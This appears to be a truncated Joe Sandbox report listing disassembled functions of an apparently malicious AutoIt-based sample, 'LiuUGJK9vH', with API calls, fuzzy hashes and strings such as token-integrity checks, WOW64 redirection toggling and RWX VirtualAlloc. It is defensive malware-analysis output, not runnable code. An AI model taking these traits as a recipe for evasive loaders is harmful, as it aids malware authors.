                      • Instruction ID: 4ceb344e541e682f07f906f107c4893f4acd0a9012da7968cf5d6b0cf31b4d70
                      • Opcode Fuzzy Hash: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                      • Instruction Fuzzy Hash: 89015B71D01A19DBCF00DFE4DC585EEBB78FB09711F4004AAE941F2240DB3459548BAA
                      APIs
                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: HeapInformationToken$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 44706859-0
                      • Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                      • Instruction ID: c07733b115f7f4265118d5d6f8c893d5168d9180ec19ac620c451b64c6eb697f
                      • Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                      • Instruction Fuzzy Hash: 71F0AF70200704AFEB110FA5EC88E6B3BACEF4A755B10043EF945D2250DF649C09DB64
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
                      • MessageBeep.USER32(00000000), ref: 0045C226
                      • KillTimer.USER32(?,0000040A), ref: 0045C242
                      • EndDialog.USER32(?,00000001), ref: 0045C25C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                      • String ID:
                      • API String ID: 3741023627-0
                      • Opcode ID: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                      • Instruction ID: 1cbdf9da880a683b58ffeaf16326a4f2222d3a7c74a558aa9ab436c5b6b9af77
                      • Opcode Fuzzy Hash: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                      • Instruction Fuzzy Hash: DF0167309047049BEB205B54DD8EB9A7778BB00706F000ABEB942A15E1DBF8699DDB59
                      APIs
                      • _free.LIBCMT ref: 02F93189
                        • Part of subcall function 02F92096: HeapFree.KERNEL32(00000000,00000000,?,02F93208,?,00000000,?,00000000,?,02F9322F,?,00000007,?,?,02F92697,?), ref: 02F920AC
                        • Part of subcall function 02F92096: GetLastError.KERNEL32(?,?,02F93208,?,00000000,?,00000000,?,02F9322F,?,00000007,?,?,02F92697,?,?), ref: 02F920BE
                      • _free.LIBCMT ref: 02F9319B
                      • _free.LIBCMT ref: 02F931AD
                      • _free.LIBCMT ref: 02F931BF
                      • _free.LIBCMT ref: 02F931D1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 4aad69fb67f2ee0a84a7ca2cf82cc309062ff486820b0e2e94e29d8c7e2b4f72
                      • Instruction ID: 70d4a9b1a9711deeb65efc928d5e15c86d5dc5df1d90c4412d3e53a3998354fb
                      • Opcode Fuzzy Hash: 4aad69fb67f2ee0a84a7ca2cf82cc309062ff486820b0e2e94e29d8c7e2b4f72
                      • Instruction Fuzzy Hash: 89F0FF36D44204BBBE35EA64E9C5C16B3DABA047D57640C49EB49D7614CB30F8908F64
                      APIs
                      • EndPath.GDI32(?), ref: 004013BF
                      • StrokeAndFillPath.GDI32(?,?,0043B888,00000000,?), ref: 004013DB
                      • SelectObject.GDI32(?,00000000), ref: 004013EE
                      • DeleteObject.GDI32 ref: 00401401
                      • StrokePath.GDI32(?), ref: 0040141C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Path$ObjectStroke$DeleteFillSelect
                      • String ID:
                      • API String ID: 2625713937-0
                      • Opcode ID: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                      • Instruction ID: 52848d70ea624aaff4fbf1a8dc35ad1b05fe5f58837c3e038025b123c59b5ab6
                      • Opcode Fuzzy Hash: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                      • Instruction Fuzzy Hash: E9F01930000A08EFDB516F26EC4CB5D3BA4A741326F188639E829981F1CB3459A9DF28
                      APIs
                        • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                        • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                        • Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB
                      • __swprintf.LIBCMT ref: 00412ECD
                      Strings
                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                      • API String ID: 1943609520-557222456
                      • Opcode ID: e0421d24bfd65513c9fcf2f49b072e57e4d72dd07e3c415dfad939c788340ccf
                      • Instruction ID: 5fa1cbf72f49bdff47ddac1708762697048697bfe45d30711dc422f43ccdaf03
                      • Opcode Fuzzy Hash: e0421d24bfd65513c9fcf2f49b072e57e4d72dd07e3c415dfad939c788340ccf
                      • Instruction Fuzzy Hash: AF91AD716083119FD714EF25D985CAFB7A8EF85314F00482FF441AB2A2DA78ED85CB5A
                      APIs
                      • OleSetContainedObject.OLE32(?,00000001), ref: 0045B4BE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ContainedObject
                      • String ID: AutoIt3GUI$Container$%I
                      • API String ID: 3565006973-4251005282
                      • Opcode ID: 859201fce2af07cea7d3cab38f5f66955440e88cc47174b58300a9c10060e76e
                      • Instruction ID: 7009c248d49ee490af6c5c3a89f60ad5612698b65dddc7868321d046ba5149c9
                      • Opcode Fuzzy Hash: 859201fce2af07cea7d3cab38f5f66955440e88cc47174b58300a9c10060e76e
                      • Instruction Fuzzy Hash: E6915B70200605AFDB14DF64C884B6ABBE5FF49705F20856EED46CB392EB74E845CBA4
                      APIs
                      • __startOneArgErrorHandling.LIBCMT ref: 004250AD
                        • Part of subcall function 004300F0: __87except.LIBCMT ref: 0043012B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorHandling__87except__start
                      • String ID: pow
                      • API String ID: 2905807303-2276729525
                      • Opcode ID: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                      • Instruction ID: 06df28618b400316a62ebb5dd7aba5b0962afb7cd5aceff72fbc56c90cb9ae17
                      • Opcode Fuzzy Hash: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                      • Instruction Fuzzy Hash: 20518B20B0C50186DB217B24ED2137F2B909B44700F608AABE4D5863AADE3D8DD4DB8E
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID: 3cA$_A
                      • API String ID: 4104443479-3480954128
                      • Opcode ID: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                      • Instruction ID: c37b5588275ae9a3f9bfbb083816e01235b481b2fd059d6d91eac45173b7304a
                      • Opcode Fuzzy Hash: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                      • Instruction Fuzzy Hash: 24516B70E006199FDB64CF68C880AAEBBB1FF44304F14852EE85AD7350EB39A995CB55
                      APIs
                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00487461
                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00487475
                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00487499
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$Window
                      • String ID: SysMonthCal32
                      • API String ID: 2326795674-1439706946
                      • Opcode ID: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                      • Instruction ID: a782af31bde95408328e4f00c38aa01da76ea549d3e2a3982252f7da8ca2871c
                      • Opcode Fuzzy Hash: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                      • Instruction Fuzzy Hash: CD21D032100218BBDF11DFA4CC42FEE3B69EB48724F210615FE156B190DA79EC918BA4
                      APIs
                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$MoveWindow
                      • String ID: Listbox
                      • API String ID: 3315199576-2633736733
                      • Opcode ID: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                      • Instruction ID: 4c3adc306d008ae433eb9b24af907097c824bc429f4b76309dac7fd9fc57b361
                      • Opcode Fuzzy Hash: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                      • Instruction Fuzzy Hash: 0B21F232600118BFEF129F54CC45FAF3BBAEF89750F028529F940AB2A0C675AC5197A4
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __calloc_crt
                      • String ID: K$@BL
                      • API String ID: 3494438863-2209178351
                      • Opcode ID: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                      • Instruction ID: ecd99e2cd8c25bd978de89897c730db32a1f4afae71c84053b65a056749c41d4
                      • Opcode Fuzzy Hash: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                      • Instruction Fuzzy Hash: 13F0A4713056318BE7A48F15BC51E9A6BD4EB40334F91006BE504CE280EB38B8818A9C
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                      • API String ID: 2574300362-3689287502
                      • Opcode ID: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                      • Instruction ID: 336b7b4d781913fc81d88f89c4603830af099844575e0fd289a57b9d24372fc6
                      • Opcode Fuzzy Hash: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                      • Instruction Fuzzy Hash: 21D08C70500712CFD7206F70D90830BB6D5AF08352B118C3E9481D2690E6B8D8808728
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                      • API String ID: 2574300362-1355242751
                      • Opcode ID: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                      • Instruction ID: 94e8dd0119df68c591ce1b6916bf7291aa534648892bae55459e1f5a441e7c38
                      • Opcode Fuzzy Hash: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                      • Instruction Fuzzy Hash: 05D0C270500713CFD7206F31C80830A72D4AF00351B218C3F9591D62A8E678D8C0C728
                      APIs
                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: RegDeleteKeyExW$advapi32.dll
                      • API String ID: 2574300362-4033151799
                      • Opcode ID: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                      • Instruction ID: d6bbf1028a7b4fc64c7871010167997e003500dc78b62918f38a53d73d50c6ba
                      • Opcode Fuzzy Hash: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                      • Instruction Fuzzy Hash: ACD08231560322DFC320AF70C80838B72E4AF04342F208C3E9582C2250E6B8D8948B28
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00478CF4,?,0048F910), ref: 004790EE
                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479100
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetModuleHandleExW$kernel32.dll
                      • API String ID: 2574300362-199464113
                      • Opcode ID: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                      • Instruction ID: 12f83e0466186043ebac617d8a25d984f844cdccf99b41ce397239b1d45cf92f
                      • Opcode Fuzzy Hash: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                      • Instruction Fuzzy Hash: E6D0EC34510723DFD7209B35D81C64A76D4AF05751B51CC3E9485D6650E678D894C754
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                      • Instruction ID: 13cbbea2f029a5b6ef5998baa1d0dcecb81b6aaeffd6b1af622dda72ce090ed1
                      • Opcode Fuzzy Hash: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                      • Instruction Fuzzy Hash: B9C19C74A04216EFCB14CFA4D884AAEBBB5FF48311B1085A9EC05DB352D734ED85DB94
                      APIs
                      • CharLowerBuffW.USER32(?,?), ref: 0047E0BE
                      • CharLowerBuffW.USER32(?,?), ref: 0047E101
                        • Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
                      • _memmove.LIBCMT ref: 0047E314
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
